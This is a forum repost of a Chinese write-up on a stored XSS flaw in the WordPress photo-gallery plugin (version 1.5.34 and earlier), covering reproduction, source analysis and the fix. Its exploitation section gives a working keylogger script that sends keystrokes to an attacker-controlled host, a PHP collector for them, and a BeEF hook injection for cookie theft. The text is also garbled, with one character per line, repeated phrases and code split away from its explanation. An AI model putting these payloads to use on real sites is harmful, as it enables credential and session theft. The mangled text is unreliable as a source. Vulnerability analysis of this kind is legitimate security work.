论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[14634] 2019-09-27_WordPress插件中的XSS漏洞的复现分析与利用
文档创建者:
s7ckTeam
浏览次数:
12
最后更新:
2025-01-18
漏洞
12 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-09-27_WordPress插件中的XSS漏洞的复现分析与利用
W
o
r
d
P
r
e
s
s
插
件
中
的
X
S
S
漏
洞
的
复
现
分
析
与
利
用
N
e
r
o
q
i
F
r
e
e
B
u
f
2
0
1
9
-
0
9
-
2
7
前
言
前
言
W
o
r
d
P
r
e
s
s
起
初
是
一
款
个
人
博
客
系
统
,
后
来
逐
步
地
演
化
成
为
一
款
内
容
管
理
系
统
软
件
。
它
使
用
起
初
是
一
款
个
人
博
客
系
统
,
后
来
逐
步
地
演
化
成
为
一
款
内
容
管
理
系
统
软
件
。
它
使
用
P
H
P
语
言
和
语
言
和
M
y
S
Q
L
数
据
库
开
发
而
成
,
用
户
可
以
在
支
持
相
应
数
据
库
开
发
而
成
,
用
户
可
以
在
支
持
相
应
版
本
的
版
本
的
P
H
P
和
和
M
y
S
Q
L
数
据
库
的
服
务
器
上
方
便
快
捷
地
搭
建
自
己
的
博
客
或
者
网
站
。
数
据
库
的
服
务
器
上
方
便
快
捷
地
搭
建
自
己
的
博
客
或
者
网
站
。
W
o
r
d
P
r
e
s
s
中
的
中
的
p
h
o
t
o
-
g
a
l
l
e
r
y
插
件
可
以
让
用
户
在
短
短
几
分
钟
内
构
建
十
插
件
可
以
让
用
户
在
短
短
几
分
钟
内
构
建
十
分
漂
亮
精
美
的
照
片
库
。
在
分
漂
亮
精
美
的
照
片
库
。
在
p
h
o
t
o
-
g
a
l
l
e
r
y
<
=
1
.
5
.
3
4
的
版
本
中
存
在
存
储
型
的
版
本
中
存
在
存
储
型
X
S
S
漏
洞
,
一
旦
被
黑
客
利
用
,
将
会
产
生
非
常
严
重
的
后
果
,
本
文
我
们
详
细
讨
论
该
漏
漏
洞
,
一
旦
被
黑
客
利
用
,
将
会
产
生
非
常
严
重
的
后
果
,
本
文
我
们
详
细
讨
论
该
漏
洞
。
洞
。
实
验
环
境
实
验
环
境
1
.
渗
透
主
机
:
k
a
l
i
-
l
i
n
u
x
-
2
0
1
8
.
3
-
v
m
-
i
3
8
6
2
.
目
标
主
机
:
D
e
b
i
a
n
9
.
6
x
6
4
3
.
软
件
版
本
:
w
o
r
d
p
r
e
s
s
-
5
.
2
.
2
4
.
插
件
版
本
:
p
h
o
t
o
-
g
a
l
l
e
r
y
.
1
.
5
.
3
4
涉
及
工
具
涉
及
工
具
1
.
X
A
M
P
P
f
o
r
L
i
n
u
x
5
.
6
.
3
0
2
.
B
e
E
F
0
.
4
.
7
.
0
-
a
l
p
h
a
3
.
M
o
z
i
l
l
a
F
i
r
e
f
o
x
6
0
.
6
.
2
漏
洞
复
现
漏
洞
复
现
1
.
在
p
h
o
t
o
-
g
a
l
l
e
r
y
的
A
d
d
G
a
l
l
e
r
i
e
s
/
I
m
a
g
e
s
模
块
中
新
建
一
个
名
为
T
e
s
t
的
照
片
库
,
在
B
a
s
i
c
和
A
d
v
a
n
c
e
d
中
分
别
添
加
图
片
,
如
下
图
所
示
:
2
.
设
置
G
a
l
l
e
r
y
t
i
t
l
e
、
S
l
u
g
以
及
D
e
s
c
r
i
p
t
i
o
n
等
条
目
的
信
息
,
如
下
图
所
示
:
3
.
选
中
图
片
进
行
编
辑
,
在
图
片
的
A
l
t
/
T
i
t
l
e
文
本
框
中
输
入
如
下
脚
本
:
在
D
e
s
c
r
i
p
t
i
o
n
文
本
框
中
输
入
如
下
脚
本
:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
"
H
e
l
l
o
"
)
;
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
"
W
o
r
l
d
"
)
;
<
/
s
c
r
i
p
t
>
用
于
验
证
这
两
处
是
否
存
在
X
S
S
漏
洞
,
如
下
图
所
示
:
4
.
点
击
G
a
l
l
e
r
y
中
的
s
a
v
e
按
钮
保
存
照
片
库
设
置
,
然
后
点
击
P
r
e
v
i
e
w
按
钮
,
可
以
看
到
“
H
e
l
l
o
”
弹
窗
,
说
明
A
l
t
/
T
i
t
l
e
文
本
框
存
在
X
S
S
漏
洞
,
如
下
图
所
示
:
5
.
在
点
击
G
a
l
l
e
r
y
中
的
P
r
e
v
i
e
w
按
钮
之
后
,
再
点
击
页
面
中
的
图
片
,
可
以
看
到
“
W
o
r
l
d
”
弹
窗
,
说
明
D
e
s
c
r
i
p
t
i
o
n
文
本
框
也
存
在
X
S
S
漏
洞
,
如
下
图
所
示
:
由
此
我
们
可
以
确
定
,
在
插
件
p
h
o
t
o
-
g
a
l
l
e
r
y
的
A
d
d
G
a
l
l
e
r
i
e
s
/
I
m
a
g
e
s
模
块
中
存
在
两
处
存
储
型
X
S
S
漏
洞
。
只
要
用
户
点
击
了
如
下
U
R
L
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
8
8
.
1
5
5
/
w
o
r
d
p
r
e
s
s
/
b
w
g
_
g
a
l
l
e
r
y
/
t
e
s
t
x
s
s
/
或
者
点
击
了
该
页
面
中
的
图
片
,
就
会
遭
受
到
X
S
S
恶
意
脚
本
的
攻
击
。
漏
洞
分
析
漏
洞
分
析
通
过
分
析
源
代
码
,
我
们
找
到
了
X
S
S
漏
洞
的
产
生
点
,
有
关
的
问
题
源
码
具
体
如
下
:
变
量
d
e
s
c
r
i
p
t
i
o
n
和
a
l
t
分
别
对
应
页
面
中
的
D
e
s
c
r
i
p
t
i
o
n
和
A
l
t
/
T
i
t
l
e
区
域
。
类
W
D
W
L
i
b
r
a
r
y
的
静
态
函
数
g
e
t
和
v
a
l
i
d
a
t
e
_
d
a
t
a
的
具
体
代
码
如
下
:
$
d
e
s
c
r
i
p
t
i
o
n
=
s
t
r
_
r
e
p
l
a
c
e
(
a
r
r
a
y
(
'
'
,
'
t
'
)
,
'
'
,
W
D
W
L
i
b
r
a
r
y
:
:
g
e
t
(
'
i
m
a
g
e
_
d
e
s
c
r
i
p
t
i
o
n
_
'
.
$
i
m
a
g
e
_
i
d
,
'
'
)
)
;
$
a
l
t
=
s
t
r
_
r
e
p
l
a
c
e
(
a
r
r
a
y
(
'
'
,
'
t
'
)
,
'
'
,
W
D
W
L
i
b
r
a
r
y
:
:
g
e
t
(
'
i
m
a
g
e
_
a
l
t
_
t
e
x
t
_
'
.
$
i
m
a
g
e
_
i
d
,
'
'
,
F
A
L
S
E
)
)
;
$
a
l
t
=
e
s
c
_
h
t
m
l
(
p
r
e
g
_
r
e
p
l
a
c
e
(
"
/
]
*
>
|
<
/
a
>
/
"
,
'
'
,
$
a
l
t
)
)
;
p
u
b
l
i
c
s
t
a
t
i
c
f
u
n
c
t
i
o
n
g
e
t
(
$
k
e
y
,
$
d
e
f
a
u
l
t
_
v
a
l
u
e
=
'
'
,
$
e
s
c
_
h
t
m
l
=
t
r
u
e
)
{
i
f
(
i
s
s
e
t
(
$
_
G
E
T
[
$
k
e
y
]
)
)
{
$
v
a
l
u
e
=
$
_
G
E
T
[
$
k
e
y
]
;
}
e
l
s
e
i
f
(
i
s
s
e
t
(
$
_
P
O
S
T
[
$
k
e
y
]
)
)
{
$
v
a
l
u
e
=
$
_
P
O
S
T
[
$
k
e
y
]
;
}
e
l
s
e
i
f
(
i
s
s
e
t
(
$
_
R
E
Q
U
E
S
T
[
$
k
e
y
]
)
)
{
$
v
a
l
u
e
=
$
_
R
E
Q
U
E
S
T
[
$
k
e
y
]
;
}
e
l
s
e
{
$
v
a
l
u
e
=
$
d
e
f
a
u
l
t
_
v
a
l
u
e
;
}
i
f
(
i
s
_
a
r
r
a
y
(
$
v
a
l
u
e
)
)
{
a
r
r
a
y
_
w
a
l
k
_
r
e
c
u
r
s
i
v
e
(
$
v
a
l
u
e
,
a
r
r
a
y
(
'
s
e
l
f
'
,
'
v
a
l
i
d
a
t
e
_
d
a
t
a
'
)
,
$
e
s
c
_
h
t
m
l
)
;
$
d
e
s
c
r
i
p
t
i
o
n
在
使
用
类
W
D
W
L
i
b
r
a
r
y
的
静
态
函
数
g
e
t
时
,
未
给
参
数
$
e
s
c
_
h
t
m
l
赋
值
,
那
么
$
e
s
c
_
h
t
m
l
使
用
默
认
值
t
r
u
e
,
即
直
接
使
用
e
s
c
_
h
t
m
l
函
数
对
从
前
端
获
取
到
的
数
据
进
行
过
滤
消
毒
。
$
a
l
t
在
使
用
类
W
D
W
L
i
b
r
a
r
y
的
静
态
函
数
g
e
t
时
,
给
参
数
$
e
s
c
_
h
t
m
l
赋
值
F
A
L
S
E
,
即
在
g
e
t
函
数
中
不
使
用
e
s
c
_
h
t
m
l
函
数
过
滤
消
毒
,
而
是
先
使
用
p
r
e
g
_
r
e
p
l
a
c
e
函
数
进
行
正
则
表
达
式
匹
配
,
再
使
用
e
s
c
_
h
t
m
l
函
数
进
行
过
滤
。
函
数
e
s
c
_
h
t
m
l
的
代
码
如
下
:
在
p
r
e
g
_
r
e
p
l
a
c
e
函
数
中
使
用
的
正
则
表
达
式
”
/
]
*
>
|
<
/
a
>
/
“
无
法
匹
配
类
似
于
的
X
S
S
测
试
脚
本
。
w
p
_
c
h
e
c
k
_
i
n
v
a
l
i
d
_
u
t
f
8
函
数
用
于
检
查
字
符
串
中
是
否
存
在
无
效
的
u
t
f
8
编
码
。
_
w
p
_
s
p
e
c
i
a
l
c
h
a
r
s
函
数
将
一
些
特
殊
字
符
转
换
为
其
H
T
M
L
实
体
,
具
体
包
含
&
,
<
,
>
,
“
,
a
n
d
‘
.
这
些
字
符
,
但
只
是
将
这
些
特
殊
字
符
进
行
h
t
m
l
编
码
存
储
,
并
没
有
将
其
过
滤
。
综
上
,
过
滤
方
法
并
未
起
作
用
,
因
此
X
S
S
脚
本
完
整
地
保
存
在
了
M
y
S
Q
L
数
据
库
中
,
如
下
图
所
示
:
漏
洞
修
复
漏
洞
修
复
针
对
版
本
号
<
=
1
.
5
.
3
4
的
模
块
中
存
在
的
X
S
S
漏
洞
,
建
议
及
时
将
P
h
o
t
o
-
G
a
l
l
e
r
y
模
块
更
新
到
1
.
5
.
3
5
及
以
上
版
本
。
在
1
.
5
.
3
5
版
本
中
,
问
题
代
码
得
到
了
修
复
,
修
复
后
的
代
码
如
下
:
$
d
e
s
c
r
i
p
t
i
o
n
和
$
a
l
t
在
使
用
类
W
D
W
L
i
b
r
a
r
y
的
静
态
函
数
g
e
t
时
,
都
给
g
e
t
函
数
传
入
了
参
数
w
p
_
f
i
l
t
e
r
_
p
o
s
t
_
k
s
e
s
,
用
于
对
从
前
端
获
取
到
的
数
据
进
行
过
滤
消
毒
。
函
数
w
p
_
f
i
l
t
e
r
_
p
o
s
t
_
k
s
e
s
利
用
a
d
d
s
l
a
s
h
e
s
在
函
数
w
p
_
k
s
e
s
返
回
的
数
据
中
的
预
定
义
字
符
之
前
添
加
反
斜
杠
,
具
体
代
码
如
下
:
函
数
w
p
_
k
s
e
s
用
于
过
滤
文
本
内
容
并
且
删
除
不
允
许
的
H
T
M
L
字
符
串
,
返
回
仅
包
含
允
许
的
H
T
M
L
字
符
串
的
筛
选
内
容
,
具
体
代
码
如
下
:
其
中
函
数
w
p
_
k
s
e
s
_
s
p
l
i
t
通
过
正
则
表
达
式
可
以
准
确
匹
配
并
过
滤
X
S
S
脚
本
代
码
,
具
体
代
码
如
下
:
a
r
r
a
y
_
w
a
l
k
_
r
e
c
u
r
s
i
v
e
(
$
v
a
l
u
e
,
a
r
r
a
y
(
'
s
e
l
f
'
,
'
v
a
l
i
d
a
t
e
_
d
a
t
a
'
)
,
$
e
s
c
_
h
t
m
l
)
;
}
e
l
s
e
{
s
e
l
f
:
:
v
a
l
i
d
a
t
e
_
d
a
t
a
(
$
v
a
l
u
e
,
$
e
s
c
_
h
t
m
l
)
;
}
r
e
t
u
r
n
$
v
a
l
u
e
;
}
p
r
i
v
a
t
e
s
t
a
t
i
c
f
u
n
c
t
i
o
n
v
a
l
i
d
a
t
e
_
d
a
t
a
(
&
$
v
a
l
u
e
,
$
e
s
c
_
h
t
m
l
)
{
$
v
a
l
u
e
=
s
t
r
i
p
s
l
a
s
h
e
s
(
$
v
a
l
u
e
)
;
i
f
(
$
e
s
c
_
h
t
m
l
)
{
$
v
a
l
u
e
=
e
s
c
_
h
t
m
l
(
$
v
a
l
u
e
)
;
}
}
f
u
n
c
t
i
o
n
e
s
c
_
h
t
m
l
(
$
t
e
x
t
)
{
$
s
a
f
e
_
t
e
x
t
=
w
p
_
c
h
e
c
k
_
i
n
v
a
l
i
d
_
u
t
f
8
(
$
t
e
x
t
)
;
$
s
a
f
e
_
t
e
x
t
=
_
w
p
_
s
p
e
c
i
a
l
c
h
a
r
s
(
$
s
a
f
e
_
t
e
x
t
,
E
N
T
_
Q
U
O
T
E
S
)
;
r
e
t
u
r
n
a
p
p
l
y
_
f
i
l
t
e
r
s
(
'
e
s
c
_
h
t
m
l
'
,
$
s
a
f
e
_
t
e
x
t
,
$
t
e
x
t
)
;
}
$
d
e
s
c
r
i
p
t
i
o
n
=
s
t
r
_
r
e
p
l
a
c
e
(
a
r
r
a
y
(
'
'
,
'
t
'
)
,
'
'
,
W
D
W
L
i
b
r
a
r
y
:
:
g
e
t
(
'
i
m
a
g
e
_
d
e
s
c
r
i
p
t
i
o
n
_
'
.
$
i
m
a
g
e
_
i
d
,
'
w
p
_
f
i
l
t
e
r
_
p
o
s
t
_
k
s
e
s
'
)
)
;
$
a
l
t
=
s
t
r
_
r
e
p
l
a
c
e
(
a
r
r
a
y
(
'
'
,
'
t
'
)
,
'
'
,
W
D
W
L
i
b
r
a
r
y
:
:
g
e
t
(
'
i
m
a
g
e
_
a
l
t
_
t
e
x
t
_
'
.
$
i
m
a
g
e
_
i
d
,
'
'
,
'
w
p
_
f
i
l
t
e
r
_
p
o
s
t
_
k
s
e
s
'
)
)
;
$
a
l
t
=
p
r
e
g
_
r
e
p
l
a
c
e
(
"
/
]
*
>
|
<
/
a
>
/
"
,
'
'
,
$
a
l
t
)
;
f
u
n
c
t
i
o
n
w
p
_
f
i
l
t
e
r
_
p
o
s
t
_
k
s
e
s
(
$
d
a
t
a
)
{
r
e
t
u
r
n
a
d
d
s
l
a
s
h
e
s
(
w
p
_
k
s
e
s
(
s
t
r
i
p
s
l
a
s
h
e
s
(
$
d
a
t
a
)
,
'
p
o
s
t
'
)
)
;
}
f
u
n
c
t
i
o
n
w
p
_
k
s
e
s
(
$
s
t
r
i
n
g
,
$
a
l
l
o
w
e
d
_
h
t
m
l
,
$
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
=
a
r
r
a
y
(
)
)
{
i
f
(
e
m
p
t
y
(
$
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
)
)
{
$
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
=
w
p
_
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
(
)
;
}
$
s
t
r
i
n
g
=
w
p
_
k
s
e
s
_
n
o
_
n
u
l
l
(
$
s
t
r
i
n
g
,
a
r
r
a
y
(
'
s
l
a
s
h
_
z
e
r
o
'
=
>
'
k
e
e
p
'
)
)
;
$
s
t
r
i
n
g
=
w
p
_
k
s
e
s
_
n
o
r
m
a
l
i
z
e
_
e
n
t
i
t
i
e
s
(
$
s
t
r
i
n
g
)
;
$
s
t
r
i
n
g
=
w
p
_
k
s
e
s
_
h
o
o
k
(
$
s
t
r
i
n
g
,
$
a
l
l
o
w
e
d
_
h
t
m
l
,
$
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
)
;
r
e
t
u
r
n
w
p
_
k
s
e
s
_
s
p
l
i
t
(
$
s
t
r
i
n
g
,
$
a
l
l
o
w
e
d
_
h
t
m
l
,
$
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
)
;
}
f
u
n
c
t
i
o
n
w
p
_
k
s
e
s
_
s
p
l
i
t
(
$
s
t
r
i
n
g
,
$
a
l
l
o
w
e
d
_
h
t
m
l
,
$
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
)
{
g
l
o
b
a
l
$
p
a
s
s
_
a
l
l
o
w
e
d
_
h
t
m
l
,
$
p
a
s
s
_
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
;
$
p
a
s
s
_
a
l
l
o
w
e
d
_
h
t
m
l
=
$
a
l
l
o
w
e
d
_
h
t
m
l
;
$
p
a
s
s
_
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
=
$
a
l
l
o
w
e
d
_
p
r
o
t
o
c
o
l
s
;
r
e
t
u
r
n
p
r
e
g
_
r
e
p
l
a
c
e
_
c
a
l
l
b
a
c
k
(
'
%
(
|
$
)
)
|
(
<
[
^
>
]
*
(
>
|
$
)
|
>
)
%
'
,
'
_
w
p
_
k
s
e
s
_
s
p
l
i
t
_
c
a
l
l
b
a
c
k
'
,
$
s
t
r
i
n
g
)
;
}
修
复
后
的
代
码
中
,
将
类
W
D
W
L
i
b
r
a
r
y
的
静
态
函
数
g
e
t
中
的
形
参
$
e
s
c
_
h
t
m
l
=
t
r
u
e
修
改
为
$
c
a
l
l
b
a
c
k
=
'
e
s
c
_
h
t
m
l
'
,
此
时
默
认
使
用
e
s
c
_
h
t
m
l
函
数
进
行
过
滤
;
如
果
有
实
参
传
入
,
本
例
中
传
入
w
p
_
f
i
l
t
e
r
_
p
o
s
t
_
k
s
e
s
,
那
么
就
使
用
w
p
_
f
i
l
t
e
r
_
p
o
s
t
_
k
s
e
s
函
数
进
行
过
滤
。
语
句
a
r
r
a
y
_
w
a
l
k
_
r
e
c
u
r
s
i
v
e
(
$
v
a
l
u
e
,
a
r
r
a
y
(
'
s
e
l
f
'
,
'
v
a
l
i
d
a
t
e
_
d
a
t
a
'
)
,
$
c
a
l
l
b
a
c
k
)
,
将
参
数
$
c
a
l
l
b
a
c
k
传
递
到
类
W
D
W
L
i
b
r
a
r
y
本
身
的
静
态
函
数
v
a
l
i
d
a
t
e
_
d
a
t
a
中
,
然
后
使
用
v
a
l
i
d
a
t
e
_
d
a
t
a
函
数
循
环
处
理
数
组
v
a
l
u
e
中
的
值
。
静
态
函
数
g
e
t
的
具
体
代
码
如
下
:
静
态
函
数
v
a
l
i
d
a
t
e
_
d
a
t
a
的
代
码
如
下
:
漏
洞
利
用
漏
洞
利
用
1
.
利
用
X
S
S
漏
洞
获
取
键
盘
记
录
:
1
.
1
将
k
e
y
r
e
c
o
r
d
e
r
.
j
s
和
k
e
y
r
e
c
o
r
d
e
r
.
p
h
p
保
存
到
渗
透
主
机
K
a
l
i
的
/
v
a
r
/
w
w
w
/
h
t
m
l
目
录
下
,
通
过
命
令
s
e
r
v
i
c
e
a
p
a
c
h
e
2
s
t
a
r
t
来
启
动
a
p
a
c
h
e
服
务
。
k
e
y
r
e
c
o
r
d
e
r
.
j
s
代
码
如
下
:
k
e
y
r
e
c
o
r
d
e
r
.
p
h
p
代
码
如
下
:
1
.
2
在
A
l
t
/
T
i
t
l
e
或
者
D
e
s
c
r
i
p
t
i
o
n
文
本
框
中
输
入
如
下
语
句
:
点
击
s
a
v
e
按
钮
保
存
修
改
,
再
点
击
P
r
e
v
i
e
w
进
行
照
片
库
预
览
。
1
.
3
然
后
在
页
面
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
8
8
.
1
5
5
/
w
o
r
d
p
r
e
s
s
/
b
w
g
_
g
a
l
l
e
r
y
/
t
e
s
t
x
s
s
/
中
的
所
有
键
盘
记
录
均
会
被
采
集
并
发
送
到
渗
透
主
机
K
a
l
i
,
这
里
我
们
输
入
H
e
l
l
o
W
o
r
l
d
!
,
K
a
l
i
中
的
k
e
y
r
e
c
o
r
d
.
t
x
t
的
内
容
如
下
图
所
示
(
键
盘
记
录
采
集
成
功
)
:
如
果
某
个
W
e
b
系
统
的
登
录
页
面
中
存
在
存
储
型
的
X
S
S
漏
洞
,
只
要
用
户
输
入
用
户
名
和
密
码
,
那
么
用
户
名
和
密
码
不
知
不
觉
中
就
会
被
传
输
到
攻
击
者
的
主
机
中
,
这
是
极
其
危
险
的
。
p
u
b
l
i
c
s
t
a
t
i
c
f
u
n
c
t
i
o
n
g
e
t
(
$
k
e
y
,
$
d
e
f
a
u
l
t
_
v
a
l
u
e
=
'
'
,
$
c
a
l
l
b
a
c
k
=
'
e
s
c
_
h
t
m
l
'
)
{
i
f
(
i
s
s
e
t
(
$
_
G
E
T
[
$
k
e
y
]
)
)
{
$
v
a
l
u
e
=
$
_
G
E
T
[
$
k
e
y
]
;
}
e
l
s
e
i
f
(
i
s
s
e
t
(
$
_
P
O
S
T
[
$
k
e
y
]
)
)
{
$
v
a
l
u
e
=
$
_
P
O
S
T
[
$
k
e
y
]
;
}
e
l
s
e
i
f
(
i
s
s
e
t
(
$
_
R
E
Q
U
E
S
T
[
$
k
e
y
]
)
)
{
$
v
a
l
u
e
=
$
_
R
E
Q
U
E
S
T
[
$
k
e
y
]
;
}
e
l
s
e
{
$
v
a
l
u
e
=
$
d
e
f
a
u
l
t
_
v
a
l
u
e
;
}
i
f
(
i
s
_
a
r
r
a
y
(
$
v
a
l
u
e
)
)
{
a
r
r
a
y
_
w
a
l
k
_
r
e
c
u
r
s
i
v
e
(
$
v
a
l
u
e
,
a
r
r
a
y
(
'
s
e
l
f
'
,
'
v
a
l
i
d
a
t
e
_
d
a
t
a
'
)
,
$
c
a
l
l
b
a
c
k
)
;
}
e
l
s
e
{
s
e
l
f
:
:
v
a
l
i
d
a
t
e
_
d
a
t
a
(
$
v
a
l
u
e
,
$
c
a
l
l
b
a
c
k
)
;
}
r
e
t
u
r
n
$
v
a
l
u
e
;
}
p
r
i
v
a
t
e
s
t
a
t
i
c
f
u
n
c
t
i
o
n
v
a
l
i
d
a
t
e
_
d
a
t
a
(
&
$
v
a
l
u
e
,
$
c
a
l
l
b
a
c
k
)
{
$
v
a
l
u
e
=
s
t
r
i
p
s
l
a
s
h
e
s
(
$
v
a
l
u
e
)
;
i
f
(
$
c
a
l
l
b
a
c
k
)
{
$
v
a
l
u
e
=
$
c
a
l
l
b
a
c
k
(
$
v
a
l
u
e
)
;
}
}
d
o
c
u
m
e
n
t
.
o
n
k
e
y
p
r
e
s
s
=
f
u
n
c
t
i
o
n
(
e
v
t
)
{
e
v
t
=
e
v
t
|
|
w
i
n
d
o
w
.
e
v
e
n
t
k
e
y
r
e
c
o
r
d
=
S
t
r
i
n
g
.
f
r
o
m
C
h
a
r
C
o
d
e
(
e
v
t
.
c
h
a
r
C
o
d
e
)
i
f
(
k
e
y
r
e
c
o
r
d
)
{
v
a
r
h
t
t
p
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
v
a
r
p
a
r
a
m
=
e
n
c
o
d
e
U
R
I
(
k
e
y
r
e
c
o
r
d
)
;
h
t
t
p
.
o
p
e
n
(
"
P
O
S
T
"
,
"
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
8
8
.
1
5
6
/
k
e
y
r
e
c
o
r
d
e
r
.
p
h
p
"
,
t
r
u
e
)
;
h
t
t
p
.
s
e
t
R
e
q
u
e
s
t
H
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
t
y
p
e
"
,
"
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
"
)
;
h
t
t
p
.
s
e
n
d
(
"
k
e
y
r
e
c
o
r
d
=
"
+
p
a
r
a
m
)
;
}
}
<
?
p
h
p
$
k
e
y
=
$
_
P
O
S
T
[
'
k
e
y
r
e
c
o
r
d
'
]
;
$
r
e
c
o
r
d
_
f
i
l
e
=
"
k
e
y
r
e
c
o
r
d
.
t
x
t
"
;
$
r
e
c
o
r
d
_
f
p
=
f
o
p
e
n
(
$
r
e
c
o
r
d
_
f
i
l
e
,
"
a
"
)
;
f
w
r
i
t
e
(
$
r
e
c
o
r
d
_
f
p
,
$
k
e
y
)
;
f
c
l
o
s
e
(
$
r
e
c
o
r
d
_
f
p
)
;
?
>
<
s
c
r
i
p
t
s
r
c
=
"
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
8
8
.
1
5
6
/
k
e
y
r
e
c
o
r
d
e
r
.
j
s
"
>
<
/
s
c
r
i
p
t
>
2
.
利
用
B
e
E
F
进
行
更
多
的
操
作
:
2
.
1
在
K
a
l
i
L
i
n
u
x
中
启
动
B
e
E
F
,
在
A
l
t
/
T
i
t
l
e
或
者
D
e
s
c
r
i
p
t
i
o
n
文
本
框
中
输
入
如
下
语
句
:
然
后
在
p
h
o
t
o
-
g
a
l
l
e
r
y
的
P
r
e
v
i
e
w
(
预
览
)
功
能
中
触
发
X
S
S
脚
本
,
接
着
B
e
E
F
就
捕
获
到
了
受
害
者
主
机
,
如
下
图
所
示
:
2
.
2
通
过
B
e
E
F
可
以
获
取
受
害
者
主
机
的
C
o
o
k
i
e
。
如
果
获
取
到
的
是
管
理
员
的
C
o
o
k
i
e
,
是
不
是
瞬
间
感
觉
X
S
S
跟
S
Q
L
注
入
一
样
有
魅
力
呢
?
是
不
是
感
觉
X
S
S
并
不
鸡
肋
了
呢
?
结
果
如
下
图
所
示
:
2
.
3
B
e
E
F
可
以
检
索
并
获
取
目
标
页
面
中
的
所
有
链
接
,
利
用
这
一
特
性
可
以
针
对
目
标
服
务
器
进
行
更
深
一
步
的
信
息
收
集
,
结
果
如
下
图
所
示
:
2
.
4
B
e
E
F
还
可
以
检
测
受
害
者
机
器
是
否
为
虚
拟
机
,
结
果
如
下
图
所
示
:
<
s
c
r
i
p
t
s
r
c
=
"
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
8
8
.
1
5
6
:
3
0
0
0
/
h
o
o
k
.
j
s
"
>
<
/
s
c
r
i
p
t
>
P
S
:
B
e
E
F
的
功
能
十
分
强
大
,
可
以
进
行
的
操
作
远
不
止
这
些
,
这
里
只
是
简
单
列
举
了
其
中
三
个
功
能
。
总
结
:
总
结
:
X
S
S
漏
洞
的
防
御
涉
及
输
入
和
输
出
两
部
分
。
一
、
对
用
户
输
入
的
数
据
进
行
过
滤
消
毒
,
包
括
H
T
M
L
特
性
、
J
a
v
a
S
c
r
i
p
t
关
键
字
、
空
字
符
、
特
殊
字
符
等
等
,
本
文
中
的
修
复
方
式
属
于
这
个
范
畴
。
二
、
对
输
出
到
页
面
上
的
内
容
进
行
相
应
的
编
码
转
换
,
包
括
H
T
M
L
实
体
编
码
、
J
a
v
a
S
c
r
i
p
t
编
码
等
。
*
本
文
原
创
作
者
:
本
文
原
创
作
者
:
N
e
r
o
q
i
,
本
文
属
于
,
本
文
属
于
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞